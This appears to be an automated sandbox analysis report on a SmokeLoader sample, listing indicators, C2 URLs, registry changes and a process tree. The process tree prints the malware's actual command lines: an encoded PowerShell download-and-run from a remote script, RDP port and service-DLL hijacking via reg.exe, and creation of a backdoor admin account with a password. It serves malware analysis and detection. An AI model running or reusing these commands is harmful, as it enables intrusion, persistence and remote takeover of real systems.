Analysis
max time kernel: 150s
max time network: 151s
platform: windows10_x64
resource: win10-en-20210920
submitted: 28-10-2021 15:12
Static task: static1
Behavioral task: behavioral1
Sample: e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exe
Resource: win10-en-20210920
General
Target: e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exe
Size: 186KB
MD5: 77402ae9e6880f83a282662fbfdea75c
SHA1: 655495fab60a558634040b83cefe927c3cfa7578
SHA256: e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6
SHA512: 01f179c698e96fb1118ea08a40e96f941cebbf5386f980f832e5339b65c48486fff317208ec5ec50ca9f704bac39960f5d95d92173310cd7992dea6ea3ad29ad
Malware Config
Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted: smokeloader (2020)
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exe (pid 3192): flows 56, 58, 59, 60, 62, 64, 66, 68, 71
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
pid 2772: 77DB.exe
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Resources (yara_rule):
\Windows\Branding\mediasrv.png: upx
\Windows\Branding\mediasvc.png: upx
-
Deletes itself 1 IoCs
Processes:
pid 3036
-
Loads dropped DLL 2 IoCs
Processes:
pid 1572
pid 1572
-
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exe: File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT
powershell.exe: File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI
powershell.exe: File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT
powershell.exe: File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI
-
Drops file in Windows directory 19 IoCs
Processes:
powershell.exe: File opened for modification C:\Windows\branding\ShellBrd
powershell.exe: File opened for modification C:\Windows\branding\mediasvc.png
powershell.exe: File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICA61.tmp
powershell.exe: File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICAC2.tmp
powershell.exe: File created C:\Windows\branding\mediasrv.png
powershell.exe: File created C:\Windows\branding\wupsvc.jpg
powershell.exe: File opened for modification C:\Windows\branding\Basebrd
powershell.exe: File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat
powershell.exe: File opened for modification C:\Windows\branding\mediasrv.png
powershell.exe: File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_4dwfkgmr.tiv.ps1
powershell.exe: File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_xjvya5gl.jhz.psm1
powershell.exe: File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICA41.tmp
powershell.exe: File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICAB2.tmp
powershell.exe: File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
powershell.exe: File created C:\Windows\branding\mediasvc.png
powershell.exe: File opened for modification C:\Windows\branding\wupsvc.jpg
powershell.exe: File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP
powershell.exe: File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICA82.tmp
powershell.exe: File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI
e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exe: Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI
e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exe: Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exe: Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]"
powershell.exe: Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"
powershell.exe: Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites"
powershell.exe: Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3"
powershell.exe: Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot
powershell.exe: Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\
powershell.exe: Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33"
powershell.exe: Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3"
powershell.exe: Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
powershell.exe: Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root
powershell.exe: Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople
powershell.exe: Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults
powershell.exe: Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"
powershell.exe: Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs
powershell.exe: Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0"
powershell.exe: Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet"
powershell.exe: Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0"
powershell.exe: Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"
powershell.exe: Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
powershell.exe: Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423"
powershell.exe: Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0
powershell.exe: Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"
powershell.exe: Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]"
powershell.exe: Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"
powershell.exe: Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains
powershell.exe: Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA
powershell.exe: Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"
powershell.exe: Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422"
powershell.exe: Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3"
WMIC.exe: Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
powershell.exe: Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3"
powershell.exe: Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1"
powershell.exe: Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones,"
powershell.exe: Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."
powershell.exe: Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs
powershell.exe: Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\
powershell.exe: Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"
powershell.exe: Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0"
powershell.exe: Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo
powershell.exe: Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet"
powershell.exe: Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3"
powershell.exe: Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs
powershell.exe: Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33"
powershell.exe: Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0"
powershell.exe: Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
WMIC.exe: Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
powershell.exe: Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0"
powershell.exe: Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424"
powershell.exe: Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0"
powershell.exe: Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings
powershell.exe: Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs
powershell.exe: Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones
powershell.exe: Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0"
powershell.exe: Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219"
powershell.exe: Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3"
powershell.exe: Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\
powershell.exe: Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs
powershell.exe: Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map
powershell.exe: Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs
powershell.exe: Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219"
powershell.exe: Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"
powershell.exe: Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates
powershell.exe: Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."
powershell.exe: Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
flow 60: HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
flow 62: HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
flow 58: HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
flow 59: HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid 3648: e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exe (2 entries)
pid 3036: no process name recorded (the remaining 62 of the 64 entries)
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid 3036
-
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid 632
pid 632
-
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
pid 3648: e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exe (pid 1756): SeDebugPrivilege
powershell.exe (pid 2852): SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
powershell.exe (pid 1640): SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
powershell.exe (pid 372): SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33 (listing stops at the 64-IoC cap)
-
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
pid 3036
pid 3036
-
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
pid 3036
pid 3036
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
PID 3036 wrote to memory of 2772 (77DB.exe), 2 entries
PID 2772 (77DB.exe) wrote to memory of 1756 (powershell.exe), 2 entries
PID 1756 (powershell.exe) wrote to memory of 1676 (csc.exe), 2 entries
PID 1676 (csc.exe) wrote to memory of 1952 (cvtres.exe), 2 entries
PID 1756 (powershell.exe) wrote to memory of 2852 (powershell.exe), 2 entries
PID 1756 (powershell.exe) wrote to memory of 1640 (powershell.exe), 2 entries
PID 1756 (powershell.exe) wrote to memory of 372 (powershell.exe), 2 entries
PID 1756 (powershell.exe) wrote to memory of 3012 (reg.exe), 2 entries
PID 1756 (powershell.exe) wrote to memory of 1504 (reg.exe), 2 entries
PID 1756 (powershell.exe) wrote to memory of 2284 (reg.exe), 2 entries
PID 1756 (powershell.exe) wrote to memory of 2996 (net.exe), 2 entries
PID 2996 (net.exe) wrote to memory of 2988 (net1.exe), 2 entries
PID 1756 (powershell.exe) wrote to memory of 2556 (cmd.exe), 2 entries
PID 2556 (cmd.exe) wrote to memory of 2264 (cmd.exe), 2 entries
PID 2264 (cmd.exe) wrote to memory of 4076 (net.exe), 2 entries
PID 4076 (net.exe) wrote to memory of 716 (net1.exe), 2 entries
PID 1756 (powershell.exe) wrote to memory of 4040 (cmd.exe), 2 entries
PID 4040 (cmd.exe) wrote to memory of 2364 (cmd.exe), 2 entries
PID 2364 (cmd.exe) wrote to memory of 380 (net.exe), 2 entries
PID 380 (net.exe) wrote to memory of 948 (net1.exe), 2 entries
PID 2172 (cmd.exe) wrote to memory of 2816 (net.exe), 2 entries
PID 2816 (net.exe) wrote to memory of 4024 (net1.exe), 2 entries
PID 1420 (cmd.exe) wrote to memory of 1740 (net.exe), 2 entries
PID 1740 (net.exe) wrote to memory of 1304 (net1.exe), 2 entries
PID 1952 (cmd.exe) wrote to memory of 3544 (net.exe), 2 entries
PID 3544 (net.exe) wrote to memory of 3180 (net1.exe), 2 entries
PID 1656 (cmd.exe) wrote to memory of 3744 (net.exe), 2 entries
PID 3744 (net.exe) wrote to memory of 3868 (net1.exe), 2 entries
PID 3900 (cmd.exe) wrote to memory of 3012 (net.exe), 2 entries
PID 3012 (net.exe) wrote to memory of 1504 (net1.exe), 2 entries
PID 3000 (cmd.exe) wrote to memory of 3808 (net.exe), 2 entries
PID 3808 (net.exe) wrote to memory of 508 (net1.exe), 2 entries
Processes
-
C:\Users\Admin\AppData\Local\Temp\e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exe (depth 1)
command line: "C:\Users\Admin\AppData\Local\Temp\e3bdb5a60e2574eb5796d3d471979b3a8e8bd5223d72560f74d4e5c0fbe25dc6.exe"
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\77DB.exe (depth 1)
command line: C:\Users\Admin\AppData\Local\Temp\77DB.exe
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (depth 3)
command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sxx5tqxr\sxx5tqxr.cmdline"
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (depth 4)
command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8DF4.tmp" "c:\Users\Admin\AppData\Local\Temp\sxx5tqxr\CSC29CC70492A45441EAE8F5CDB5DA5D327.TMP"
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe (depth 3)
command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
-
C:\Windows\system32\reg.exe (depth 3)
command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 3)
command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
-
C:\Windows\system32\net.exe (depth 3)
command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exe (depth 4)
command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
-
C:\Windows\system32\cmd.exe (depth 3)
command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe (depth 4)
command line: cmd /c net start rdpdr
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exe (depth 5)
command line: net start rdpdr
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exe (depth 6)
command line: C:\Windows\system32\net1 start rdpdr
-
C:\Windows\system32\cmd.exe (depth 3)
command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe (depth 4)
command line: cmd /c net start TermService
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exe (depth 5)
command line: net start TermService
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exe (depth 6)
command line: C:\Windows\system32\net1 start TermService
-
C:\Windows\system32\cmd.exe (depth 3)
command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
-
C:\Windows\system32\cmd.exe (depth 3)
command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
-
C:\Windows\System32\cmd.exe (depth 1)
command line: cmd /C net.exe user WgaUtilAcc 000000 /del
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exe (depth 2)
command line: net.exe user WgaUtilAcc 000000 /del
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exe (depth 3)
command line: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
-
C:\Windows\System32\cmd.exe (depth 1)
command line: cmd /C net.exe user WgaUtilAcc TNC1opdG /add
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exe (depth 2)
command line: net.exe user WgaUtilAcc TNC1opdG /add
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exe (depth 3)
command line: C:\Windows\system32\net1 user WgaUtilAcc TNC1opdG /add
-
C:\Windows\System32\cmd.exe (depth 1)
command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exe (depth 2)
command line: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exe (depth 3)
command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
-
C:\Windows\System32\cmd.exe (depth 1)
command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exe (depth 2)
command line: net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exe (depth 3)
command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
-
C:\Windows\System32\cmd.exe (depth 1)
command line: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exe (depth 2)
command line: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exe (depth 3)
command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
-
C:\Windows\System32\cmd.exe (depth 1)
command line: cmd /C net.exe user WgaUtilAcc TNC1opdG
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exe (depth 2)
command line: net.exe user WgaUtilAcc TNC1opdG
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exe (depth 3)
command line: C:\Windows\system32\net1 user WgaUtilAcc TNC1opdG
-
C:\Windows\System32\cmd.exe (depth 1)
command line: cmd.exe /C wmic path win32_VideoController get name
-
C:\Windows\System32\Wbem\WMIC.exe (depth 2)
command line: wmic path win32_VideoController get name
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.exe (depth 1)
command line: cmd.exe /C wmic CPU get NAME
-
C:\Windows\System32\Wbem\WMIC.exe (depth 2)
command line: wmic CPU get NAME
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.exe (depth 1)
command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
-
C:\Windows\system32\cmd.exe (depth 2)
command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
